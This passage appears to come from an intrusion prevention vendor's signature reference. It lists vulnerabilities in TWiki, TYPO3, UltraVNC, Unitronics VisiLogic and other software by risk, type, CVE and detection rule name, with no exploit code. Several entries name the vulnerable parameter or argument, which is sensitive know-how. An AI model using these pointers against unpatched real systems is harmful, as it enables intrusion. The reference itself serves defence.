Description: Tarantella Enterprise 3 has the ttawebtop.cgi script that does not sufficiently validate input. This makes it possible to remotely traverse the directory structure, and to view files readable by the Web server process.
References:
CVE-2001-0805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0805
BID-2890
http://www.securityfocus.com/bid/2890
Back to top

Tumbleweed-SecureTransport-FileTransfer-ActiveX-Control-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Tumbleweed SecureTransport
Risk: High
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Tumbleweed SecureTransport
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Tumbleweed SecureTransport ActiveX control. The control does not properly validate the size of the input data. This may allow arbitrary code to be injected and executed in the security context of the currently logged on user.
Situation: HTTP_SS-Tumbleweed-SecureTransport-FileTransfer-ActiveX-Control-Buffer-Overflow
File-Text_Tumbleweed-SecureTransport-FileTransfer-ActiveX-Control-BOF
References:
CVE-2008-1724
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1724
BID-28662
http://www.securityfocus.com/bid/28662
Back to top

Turbosoft-Turboftp-Server-Port-Command-Buffer-Overflow

About this vulnerability: A vulnerability in TurboSoft TurboFTP
Risk: High
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TurboFTP
Type: Buffer Overflow
Description: A code execution vulnerability has been reported in TurboSoft TurboFTP Server. The vulnerability is due to a buffer overflow when handling PORT commands. A remote attacker can exploit this vulnerability by sending a specially crafted PORT command to the target server. Successful exploitation may allow the attacker to execute arbitrary code on the target user's machine with the privileges of the TurboFTP Server process.
Situation: FTP_CS-Turbosoft-Turboftp-Server-Port-Command-Buffer-Overflow
References:
OSVDB-85887
http://www.osvdb.org/85887
Back to top

TurboVNC-Fence-Message-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in TurboVNC
Risk: High
First detected in: sgpkg-ips-1203-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: TurboVNC
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in TurboVNC, versions prior to 2.2.3, which allows remote attackers to execute arbitrary code through the Fence message, due to unsufficient input validation.
Situation: RFB_CS-TurboVNC-Fence-Message-Stack-Based-Buffer-Overflow
References:
CVE-2019-15683
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15683
Back to top

Turla-Backdoor

About this vulnerability: Turla backdoor
Risk: High
First detected in: sgpkg-ips-1695-5242
Last changed: sgpkg-ips-1695-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Turla threat group backdoors such as TinyTurla.
Situation: HTTP_CS-TinyTurla-NG-Backdoor-Traffic
Back to top

TVT-NVMS-1000-Directory-Traversal

About this vulnerability: A vulnerability in TVT NVMS-1000
Risk: High
First detected in: sgpkg-ips-1219-5242
Last changed: sgpkg-ips-1638-5242
Platform: Generic
Software: TVT Surveillance
Type: Input Validation
Description: There exists a vulnerability in TVT network surveillance management software-1000, version 3.4.1, which allows remote attackers to access restricted directories due to insufficient validation of user input.
References:
CVE-2019-20085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20085
Back to top

TWiki-And-Foswiki-MAKETEXT-Remote-Command-Execution

About this vulnerability: A TWiki And Foswiki MAKETEXT Remote Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-707-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TWiki; Foswiki
Type: Input Validation
Description: A vulnerability in Foswiki versions 1.0.x through 1.0.10 and 1.1.x through 1.1.6, and TWiki versions before 5.1.3, which allows remote attackers to execute arbitrary commands through the MAKETEXT variable, due to the _compile function in Maketext.pm not properly handling backslashes and fully qualified method names during compilation of bracket notation.
Situation: HTTP_CRL-TWiki-And-Foswiki-MAKETEXT-Remote-Command-Execution
References:
CVE-2012-6329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6329
BID-56950
http://www.securityfocus.com/bid/56950
OSVDB-88460
http://www.osvdb.org/88460
Back to top

TWiki-Remote-Perl-Code-Execution

About this vulnerability: A TWiki Remote Perl Code Execution vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TWiki
Type: Perl Injection
Description: A vulnerability in the debug functionality of TWiki, versions 4.0.x - 6.0.0, which allows remote attackers to execute Perl code through the debugenableplugins parameter.
Situation: HTTP_CRL-TWiki-Remote-Perl-Code-Execution
References:
CVE-2014-7236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7236
OSVDB-112977
http://www.osvdb.org/112977
Back to top

TWiki-Search-Function-Command-Execution-Vulnerability

About this vulnerability: Arbitrary command execution vulnerability in TWiki search function
Risk: High
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TWiki
Type: Malfunction
Description: The web-based collaboration platform TWiki could allow a remote attacker to execute arbitrary commands, caused by improper filtering of shell metacharacters in the search.pm file. A remote attacker could send a specially-crafted HTTP request to execute arbitrary commands on the system with privileges of the TWiki process.
Situation: HTTP_CRL-TWiki-Search-Function-Command-Execution-Vulnerability
References:
CVE-2004-1037
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1037
BID-11674
http://www.securityfocus.com/bid/11674
OSVDB-11714
http://www.osvdb.org/11714
Back to top

Twister-Music-File-Search-And-Download-Tool

About this vulnerability: Twister
Risk: Low
First detected in: sgpkg-ips-203-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Twister
Type: Peer-to-Peer
Description: Twister is considered unwanted software by some organizations. This product is used to search and download music files, such as mp3. It also installs AdVantage adware.
Situation: HTTP_CRL-Twister-IP-Update
HTTP_CRL-Twister-Search
Back to top

Twitter-TwitterServer-Histogramqueryhandler-Cross-Site-Scripting

About this vulnerability: A vulnerability in Twitter TwitterServer
Risk: High
First detected in: sgpkg-ips-1318-5242
Last changed: sgpkg-ips-1318-5242
Platform: Generic
Software: TwitterServer
Type: Input Validation
Description: A reflected XSS vulnerability has been reported in twitter-server. This vulnerability is due to insufficient validation on user supplied input in the HistogramQueryHandler class. A remote attacker can exploit this vulnerability by sending a crafted request to the server. Successful exploitation results in the execution of arbitrary script code in the security context of the target user's browser
Situation: HTTP_CRL-Twitter-TwitterServer-Histogramqueryhandler-Cross-Site-Scripting
References:
CVE-2020-35774
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35774
Back to top

TYPO3-CMS-Phar-Insecure-Deserialization

About this vulnerability: A vulnerability in TYPO3
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TYPO3
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in TYPO3 CMS. This vulnerability is due to insufficient validation of serialized metadata within Phar files prior to calling a file operation such as fopen, file_exists or file_get_contents. A remote attacker can exploit this vulnerability by uploading a specially crafted Phar file to the target server. Successful exploitation will result in arbitrary code execution within the security context of the user running TYPO3 CMS (e.g: www-data).
Situation: HTTP_CRL-TYPO3-CMS-Phar-Insecure-Deserialization
Back to top

TYPO3-CMS-Sanitizelocalurl-Cross-Site-Scripting

About this vulnerability: A vulnerability in TYPO3
Risk: Moderate
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TYPO3
Type: Input Validation
Description: A cross-site scripting vulnerability has been reported in Typo3 CMS. The vulnerability is due to the sanitizeLocalUrl function incorrectly validating the returnUrl and redirect_url HTTP request parameters. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted link. Successful exploitation will result in the attacker-controlled script code being executed in the target user's browser in the context of the affected site.
Situation: HTTP_CRL-TYPO3-CMS-Sanitizelocalurl-Cross-Site-Scripting
References:
CVE-2015-5956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5956
Back to top

TYPO3-File-Disclosure

About this vulnerability: A TYPO3 File Disclosure vulnerability.
Risk: High
First detected in: sgpkg-ips-726-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TYPO3
Type: Insecure Configuration
Description: A vulnerability in Typo3, multiple versions, where class.tslib_fe.php leaks a hash secret in an error message, which allows remote attackers to include the hash in a request and read arbitrary files.
Situation: HTTP_CSU_TYPO3-File-Disclosure
References:
CVE-2009-0815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0815
OSVDB-52048
http://www.osvdb.org/52048
Back to top

TYPO3-Lux-Extension-SQL-Injection

About this vulnerability: A vulnerability in TYPO3
Risk: Moderate
First detected in: sgpkg-ips-1504-5242
Last changed: sgpkg-ips-1504-5242
Platform: Generic
Software: TYPO3
Type: Input Validation
Description: Improper validation of user input causes an SQL injection vulnerability in the Lux extension for TYPO3. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CS-TYPO3-Lux-Extension-SQL-Injection
HTTP_CRL-TYPO3-Lux-Extension-SQL-Injection
References:
CVE-2022-35628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35628
Back to top

Ubiquiti-Networks-AirOS-Directory-Traversal

About this vulnerability: A vulnerability in Ubiquiti Networks AirOS
Risk: High
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ubiquiti Networks AirOS
Type: Malfunction
Description: There is a directory traversal vulnerability in the Ubiquiti Networks AirOS.
Situation: HTTP_CS-Ubiquiti-Networks-AirOS-Directory-Traversal
Back to top

Ubiquiti-Networks-AirOS-Remote-Command-Execution-CVE-2010-5330

About this vulnerability: A vulnerability in Ubiquiti Networks AirOS
Risk: High
First detected in: sgpkg-ips-1473-5242
Last changed: sgpkg-ips-1473-5242
Platform: Generic
Software: Ubiquiti Networks AirOS
Type: Input Validation
Description: There exists a remote command execution vulnerability in the Ubiquiti Networks AirOS.
Situation: HTTP_CSU-Ubiquiti-Networks-AirOS-Remote-Command-Execution-CVE-2010-5330
References:
CVE-2010-5330
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5330
Back to top

Ubisoft-Uplay-Arbitrary-Code-Execution

About this vulnerability: A Ubisoft Uplay Arbitrary Code Execution vulnerability
Risk: High
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ubisoft Uplay
Type: Insecure Configuration
Description: A vulnerability in Ubisoft Uplay, versions before 2.0.4, which allows remote attackers to execute arbitrary programs via the -orbit_exe_path command line argument.
Situation: File-Text_Ubisoft-Uplay-Arbitrary-Code-Execution
References:
CVE-2012-4177
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4177
OSVDB-84402
http://www.osvdb.org/84402
Back to top

UDP-Ethereal-IAPP-BOF

About this vulnerability: Buffer overflow vulnerability in Ethereal IAPP dissector
Risk: Moderate
First detected in: sgpkg-ips-26-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ethereal
Type: Buffer Overflow
Description: Ethereal is a network packet capturing utility. A buffer overflow vulnerability in the Ethereal IAPP dissector allows remote attacker to crash the software when the IAPP dissector processes live network traffic or a traffic dump.
Situation: Generic_Ethereal-IAPP-BOF
References:
CVE-2005-0739
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0739
BID-12762
http://www.securityfocus.com/bid/12762
Back to top

UDP-MAPI-Microsoft-Exchange-Server-DOS

About this vulnerability: Buffer overflow in Microsoft Exchange while processing malformed MAPI commands
Risk: High
First detected in: sgpkg-ips-205-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Exchange Server 2000; Exchange Server 2003
Type: Buffer Overflow
Description: A denial of service vulnerability exists in the Microsoft Exchange System Attendant. The vulnerability is a result of insufficient validation when processing crafted parameters supplied to the System Attendant service. Successful exploitation of this vulnerability can allow a remote unauthenticated attacker to terminate the affected service, causing a denial of service condition. Upon triggering this vulnerability, the System Attendant service on the target server will terminate abnormally. Users may experience interruption and temporary unavailability of all services hosted by the affected process such as: address list maintenance, enforcement of message retention policies, resource monitoring, and others.
Situation: Generic_UDP-MAPI-Microsoft-Exchange-Server-MS09-003-DOS
References:
CVE-2009-0099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0099
OSVDB-51838
http://www.osvdb.org/51838
MS09-003
http://technet.microsoft.com/security/bulletin/MS09-003
Back to top

uftpd-FTP-Server-Port-Command-Handling-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in uftpd Project uftpd
Risk: Moderate
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: uftpd
Type: Buffer Overflow
Description: There has been reported a stack-based buffer overflow vulnerability in uftpd FTP server. Successful exploitation could lead in arbitrary code execution.
Situation: FTP_CS-uftpd-FTP-Server-Port-Command-Handling-Stack-Buffer-Overflow
References:
CVE-2020-5204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5204
Back to top

Ultra-Mini-Httpd-Stack-Based-Buffer-Overflow

About this vulnerability: A stack based buffer overflow vulnerability in Ultra Mini Httpd
Risk: High
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Ultra Mini HTTPD
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Ultra Mini HTTPD 1.21 that allows remote attackers to execute arbitrary code via a long resource name in an HTTP request.
Situation: HTTP_CRL-Ultra-Mini-Httpd-Stack-Based-Buffer-Overflow
References:
CVE-2013-5019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5019
BID-61130
http://www.securityfocus.com/bid/61130
OSVDB-95164
http://www.osvdb.org/95164
Back to top

Ultra-Office-Control-ActiveX-Control-Stack-Based-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Ultra Office Control ActiveX control.
Risk: High
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Ultra Office Control
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Ultra Office Control, version 2.0.2008.501, which allows remote attackers to execute arbitrary code via a long strUrl, strFile, or strPostData parameter in the HttpUpload method.
Situation: File-Text_Ultra-Office-Control-ActiveX-Control-Stack-Based-Buffer-Overflow
References:
CVE-2008-3878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3878
BID-30861
http://www.securityfocus.com/bid/30861
OSVDB-47866
http://www.osvdb.org/47866
Back to top

UltraVNC-Authenticate-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in UltraVNC
Risk: High
First detected in: sgpkg-ips-206-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: UltraVNC
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in UltraVNC. The application does not have sufficient validation of incoming network messages. A remote attacker might trigger this vulnerability by persuading the target user to connect to a malicious VNC server. Successful exploitation may lead to arbitrary code execution in the context of the current user.
Situation: RFB_SS-UltraVNC-Authenticate-Buffer-Overflow
References:
CVE-2009-0388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0388
BID-33568
http://www.securityfocus.com/bid/33568
Back to top

UltraVNC-Client-Buffer-Overflow

About this vulnerability: An UltraVNC Client Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP SP3
Software: UltraVNC
Type: Buffer Overflow
Description: A buffer overflow vulnerability in UltraVNC versions 1.0.2 and 1.0.4 before 01252008, which allows remote attackers to execute arbitrary code via a modified size value.
Situation: Generic_SS-UltraVNC-Client-Buffer-Overflow
References:
CVE-2008-0610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0610
BID-27561
http://www.securityfocus.com/bid/27561
OSVDB-42840
http://www.osvdb.org/42840
Back to top

UltraVNC-File-Transfer-Request-Handler-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in UltraVNC Project UltraVNC
Risk: Moderate
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: UltraVNC
Type: Buffer Overflow
Description: Improper handling of file transfer requests from a client causes a stack-besed buffer overflow vulnerability in the UltraVNC server. A successful exploit causes a denial of service condition.
Situation: Generic_CS-UltraVNC-File-Transfer-Request-Handler-Stack-Based-Buffer-Overflow
References:
CVE-2019-8276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8276
Back to top

UltraVNC-VNC-Server-File-Transfer-Offer-Handler-Heap-Based-Buffer-Overflow

About this vulnerability: A vulnerability in UltraVNC Project UltraVNC
Risk: Moderate
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: UltraVNC
Type: Buffer Overflow
Description: Improper handling of file transfer offer requests from clients causes a heap-based buffer overflow vulnerability in UltraVNC. A successful exploit allows an attacker to execure arbitrary code on the target system.
Situation: Generic_CS-UltraVNC-VNC-Server-File-Transfer-Offer-Handler-Heap-Based-Buffer-Overflow
References:
CVE-2019-8274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8274
Back to top

UltraVNC-Vnclog-Buffer-Overflow

About this vulnerability: A vulnerability in UltraVNC Project UltraVNC
Risk: High
First detected in: sgpkg-ips-357-4219
Last changed: sgpkg-ips-1453-5242
Platform: Generic
Software: UltraVNC
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the UltraVNC server. The vulnerability is caused by improper validation of user supplied requests sent to the affected component. A successful attack can result in the termination of the UltraVNC service. In a situation where the malicious user is successful in injecting and executing supplied code, the behaviour of the target system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the user that launched the UltraVNC server application, though it may be SYSTEM, as the application has the option of running as a service. If the case of unsuccessful code injection, the UltraVNC application will terminate, causing denial of service.
Situation: HTTP_CSU-UltraVNC-Vnclog-Buffer-Overflow
References:
CVE-2006-1652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1652
BID-17378
http://www.securityfocus.com/bid/17378
Back to top

Umbraco-CMS-File-Upload-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Umbraco CMS
Risk: Moderate
First detected in: sgpkg-ips-1334-5242
Last changed: sgpkg-ips-1334-5242
Platform: Generic
Software: Umbraco CMS
Type: Input Validation
Description: There exists a stored cross-site scripting vulnerability in the Umbraco CMS. Successful exploitation could lead in arbitrary script execution.
Situation: HTTP_CS-Umbraco-CMS-File-Upload-Stored-Cross-Site-Scripting
References:
CVE-2020-5810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5810
Back to top

Umplayer-Wintab32.dll-Insecure-Library-Loading

About this vulnerability: A vulnerability in Ori Rejwan UMPlayer
Risk: Moderate
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-1639-5242
Platform: Generic
Software: UMPlayer
Type: Malfunction
Description: A code execution vulnerability has been identified in Ori Rejwan UMPlayer. The vulnerability is due to an improper dynamic link library (DLL) search path leading to insecure library loading. A remote attacker could exploit this vulnerability by enticing a user to open a media file from a directory, which also contains a malicious DLL. A successful attack would result in execution of arbitrary code in the security context of the affected application.
Situation: HTTP_CSU-Insecure-Microsoft-Library-Loading
SMB-TCP_CHS_Microsoft-Expression-Design-Insecure-Library-Loading-CVE-2012-0016
References:
BID-56354
http://www.securityfocus.com/bid/56354
Back to top

Un4seen-XMPlay-Stack-Based-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Un4seen XMPlay.
Risk: High
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Un4seen
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Un4seen XMPlay, versions 3.3.0.5 and earlier, which allows remote attackers to execute arbitrary code via a M3U file containing a long FileName, or cause a crash using a long DisplayName.
Situation: File-TextId_Un4seen-XMPlay-Stack-Based-Buffer-Overflow
References:
CVE-2006-6063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6063
BID-21206
http://www.securityfocus.com/bid/21206
OSVDB-30537
http://www.osvdb.org/30537
Back to top

Unauthenticated-RCE-In-Bricks-Builder-Theme

About this vulnerability: An attempt to exploit a vulnerability in the Bricks Builder Theme for WordPress detected
Risk: High
First detected in: sgpkg-ips-1715-5242
Last changed: sgpkg-ips-1715-5242
Platform: Windows; Unix; Linux
Software: WordPress Bricks Builder Theme
Type: Input Validation
Description: A vulnerability in the Bricks Builder Theme for WordPress, versions 1.9.6 before, which allows remote attackers to bypass authentication by use of a nonce, and exploit arbitrary code by use of the eval() function usage within the theme.
Situation: HTTP_CRL-Unauthenticated-RCE-In-Bricks-Builder-Theme
References:
CVE-2024-25600
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
Back to top

Unauthenticated-RCE-In-NetAlertX

About this vulnerability: A vulnerability in NetAlertX
Risk: High
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Platform: Linux
Software: NetAlertX
Type: Insecure Configuration
Description: A vulnerability in NetAlertX, versions prior to v24.10.12, which allows remote attackers to execute arbitrary commands on a target system by bypassing the setting.php page where authentication is performed.
Situation: HTTP_CS-Unauthenticated-RCE-In-NetAlertX
References:
CVE-2024-46506
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-46506
Back to top

Unauthenticated-Remote-Code-Execution-In-Ignition

About this vulnerability: A vulnerability in Ignition Laravel.
Risk: High
First detected in: sgpkg-ips-1437-5242
Last changed: sgpkg-ips-1437-5242
Platform: Unix;Windows
Software: Ignition Laravel
Type: Input Validation
Description: A vulnerability in Ignition Laravel, versions Ignition before 2.5.2, Laravel before 8.4.2, which allow remote attackers to execute arbitrary code by uploading a malicious log file, due to the insecure usage of file_get_contents() and file_put_contents().
Situation: HTTP_CRL-Unauthenticated-Remote-Code-Execution-In-Ignition
References:
CVE-2021-3129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3129
Back to top

Unicode-Formatting-Control-Characters

About this vulnerability: Unicode formatting control character handling
Risk: High
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: <os>
Type: Malfunction
Description: The Unicode character set contains a number of control characters that affect order how characters are displayed. For example Left-to-Right Override character (RLO) can be used to force to reverse the display order of the characters, and it can be used to spoof the executable extension from the file name.
Situation: HTTP_CSU-Unicode-RLO-Character
HTTP_CSU-Unicode-LRO-Character
Back to top

Unify-Ewave-Servletexec-Upload

About this vulnerability: Unify eWave ServletExec upload
Risk: High
First detected in: sgpkg-ips-137-2032
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: eWave ServletExec
Type: Insecure Configuration
Description: This servlet application provides file uploading and execution features. Access to these features is unrestricted, so the attacker may gain access to the system simply by uploading malicious code and executing it.
References:
CVE-2000-1024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1024
BID-1876
http://www.securityfocus.com/bid/1876
Back to top

Unisys-Business-Information-Server-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Unisys Business Information Server
Risk: High
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Unisys Business Information Server
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in Unisys Business Information Server. The flaw is due to a boundary error when processing crafted packets sent to the server. Successful attack may result in code execution in the context of the affected service.
Situation: Generic_CS-Unisys-Business-Information-Server-Stack-Buffer-Overflow
References:
CVE-2009-1628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1628
BID-35494
http://www.securityfocus.com/bid/35494
Back to top

Unitrends-UEB-api/storage-Remote-Root

About this vulnerability: A Unitrends UEB api/storage Remote Root vulnerability
Risk: High
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Unitrends
Type: Input Validation
Description: A vulnerability in Unitrends UEB, versions before 10.0.0, which allows remote attackers to bypass authentication and execute arbitrary commands with root privileges, due to inusfficient input validation.
Situation: HTTP_CRL-Unitrends-UEB-api/storage-Remote-Root
References:
CVE-2017-12478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12478
Back to top

Unitrends-UEB-bpserverd-Authentication-Bypass

About this vulnerability: A Unitrends UEB bpserverd Authentication Bypass vulnerability
Risk: High
First detected in: sgpkg-ips-1029-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Unitrends
Type: Input Validation
Description: A vulnerability in Unitrends, versions before 10.0.0, which allows remote attackers to bypass authentication due to improper input validation.
Situation: Generic_CS-Unitrends-UEB-bpserverd-Authentication-Bypass
References:
CVE-2017-12477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12477
Back to top

Unitronics-Unidownloader-And-VisiLogic-OPLC-Ipworksssl-Memory-Corruption

About this vulnerability: A vulnerability in Unitronics VisiLogic OPLC
Risk: Low
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Unitronics VisiLogic OPLC; Unitronics UniDownloader
Type: Malfunction
Description: A memory corruption vulnerability exists in Unitronics, VisiLogic OPLC IDE and UniDownloader. The vulnerability is due to untrusted pointer dereference on the SSLCertHandle parameter of the IPWorksSSL.HTTPS ActiveX control. A remote attacker could exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation could lead to code execution in the context of the target user.
Situation: File-Text_Unitronics-Unidownloader-And-VisiLogic-OPCL-Ipworksssl-Memory-Corruption
References:
CVE-2015-7905
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7905
Back to top

Unitronics-VisiLogic-ActiveX-Out-Of-Bounds-Array-Indexing

About this vulnerability: A vulnerability in Unitronics VisiLogic OPLC
Risk: Moderate
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Unitronics VisiLogic OPLC
Type: Malfunction
Description: There exists an out of bounds array indexing vulnerability in Unitronics VisiLogic OPLC. A remote attacker can exploit this to achieve code execution on the target system.
Situation: File-Text_Unitronics-VisiLogic-ActiveX-Out-Of-Bounds-Array-Indexing
References:
CVE-2015-6478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6478
Back to top

Unitronics-VisiLogic-OPLC-ActiveX-Control-Memory-Corruption

About this vulnerability: A vulnerability in Unitronics VisiLogic OPLC
Risk: Moderate
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Unitronics VisiLogic OPLC
Type: Malfunction
Description: There exists a memory corruption vulnerability in Unitronics VisiLogic OPLC. A remote attacker can use this to execute code on the affected machine.
Situation: File-Text_Unitronics-VisiLogic-OPLC-TeeCommander-ChartLink-ActiveX-Control-Memory-Corruption
References:
CVE-2015-6478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6478
Back to top

Unitronics-VisiLogic-OPLC-IDE-Teepreviewer-ChartLink-Memory-Corruption

About this vulnerability: A vulnerability in Unitronics VisiLogic OPLC
Risk: Moderate
First detected in: sgpkg-ips-727-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Unitronics VisiLogic OPLC
Type: Malfunction
Description: Unitronics VisiLogic OPLC IDE contains an ActiveX control that has a memory corruption vulnerability. A successful exploitation allows code execution with user privileges on the target machine.
Situation: File-Text_Unitronics-VisiLogic-OPLC-IDE-Teepreviewer-ChartLink-Memory-Corruption
References:
CVE-2015-6478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6478
Back to top

Unitronics-VisiLogic-OPLC-IDE-Vlp-File-Parsing-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Unitronics VisiLogic OPLC
Risk: High
First detected in: sgpkg-ips-724-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Unitronics VisiLogic OPLC
Type: Buffer Overflow
Description: There exists a heap buffer overflow vulnerability in Unitronics VisiLogic OPLC IDE. A remote attacker can use this to acchieve code execution on the affected machine.
Situation: File-Zip_Unitronics-VisiLogic-OPLC-IDE-Vlp-File-Parsing-Heap-Buffer-Overflow
References:
CVE-2015-7939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7939
Back to top

Universal-Plug-And-Play-Request

About this vulnerability: Universal Plug and Play request
Risk: Low
First detected in: sgpkg-ips-141-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Misconfiguration
Description: Universal Plug and Play (UPnP) is a protocol that allows an automatic remote configuration of network devices. For example, a computer in a local network can request access port redirection from the boundary router that is normally not allowed on demand. When used maliciously, it can be also used to weaken protection of the network and may allow unauthorized access to the network. Universal Plug and Play is usually enabled in network-enabled devices meant for home and small office use.
Situation: Shared_CS-Universal-Plug-And-Play-Request
Back to top

Unix-IFS-Code-Execution

About this vulnerability: An attempt to execute code on Unix operation system
Risk: High
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: <os>
Type: Malfunction
Description: Internal field separator (IFS) was detected in the traffic. This usually refers to an attempt to execute malicious code on the target system.
Situation: HTTP_CRL-Unix-IFS-Code-Execution
Back to top

Unix-System-Monitor-Messages

About this vulnerability: Unix system monitor output messages
Risk: Low
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: <os>
Type: Insecure Configuration
Description: Seeing plaintext system diagnostic outputs in network traffic may indicate insecure operation of network monitors or network breaches.
Situation: Generic_UDP-Unix-System-Monitor-Messages
Generic_CS-Unix-System-Monitor-Messages
Back to top

Unknown-Client-Side-Scripting-Filename

About this vulnerability: A reference to an unknown scripting file type inside HTML
Risk: Low
First detected in: sgpkg-ips-661-5211
